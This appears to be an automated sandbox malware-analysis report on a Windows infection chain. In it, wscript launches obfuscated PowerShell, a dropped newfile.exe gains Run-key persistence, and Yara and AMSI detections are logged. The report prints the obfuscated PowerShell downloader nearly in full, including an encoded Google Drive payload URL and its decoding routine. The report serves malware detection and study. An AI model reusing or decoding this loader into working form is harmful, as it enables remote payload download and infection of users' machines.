            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | File opened: C:\Windows\SysWOW64\msftedit.dll
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb= source: powershell.exe, 00000004.00000002.1991407968.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1999089456.0000000007459000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.1991407968.0000000002D38000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2004519989.0000000008470000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1991407968.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: indows\System.Core.pdbF source: powershell.exe, 00000004.00000002.1991407968.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: .pdb#j source: powershell.exe, 00000004.00000002.1991407968.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wab.pdb source: newfile.exe

            Data Obfuscation

            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("POWERSHELL "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=", "0")
            Source: Yara match | File source: 00000004.00000002.2006759213.000000000B869000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2261833973.00000221E3C09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2006054606.0000000008700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.1995366811.0000000005BC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Magera116)$global:reboundingness = [System.Text.Encoding]::ASCII.GetString($Preconjecturing)$global:jamboretten=$reboundingness.substring(347067,28673)<#Reprehensive Tunnelman Geoduc
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Egnsteaters $Polyplectron $Nongratifying), (Statsministrenes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Kimms = [AppDomain]::CurrentDomain.GetAssembli
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Raggety)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Nedbrsmngde, $false).DefineType($Byportens, $Ganz
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Magera116)$global:reboundingness = [System.Text.Encoding]::ASCII.GetString($Preconjecturing)$global:jamboretten=$reboundingness.substring(347067,28673)<#Reprehensive Tunnelman Geoduc
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? 
FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? 
FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker B
            Source: newfile.exe.9.dr | Static PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]
            Source: newfile.exe.9.dr | Static PE information: section name: .didat
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B890972 push E85E465Dh; ret 1_2_00007FFD9B8909F9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B963414 pushfd ; ret 1_2_00007FFD9B963415
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B966FE4 pushad ; ret 1_2_00007FFD9B966FE5
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B967A4B push esi; ret 1_2_00007FFD9B967A4C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B967D14 push ebx; ret 1_2_00007FFD9B967D15
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_047C3405 push esp; retf 4_2_047C33E9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_047C33D5 push esp; retf 4_2_047C33E9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_073B08D8 push eax; mov dword ptr [esp], ecx 4_2_073B0AC4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_073B0AB9 push eax; mov dword ptr [esp], ecx 4_2_073B0AC4
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Code function: 10_2_0062376D push ecx; ret 10_2_00623780
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Code function: 10_2_006213F8 pushfd ; retf 10_2_006213F9
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Users\user\AppData\Roaming\newfile\newfile.exe
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newfile

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\newfile\newfile.exe:Zone.Identifier read attributes | delete
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
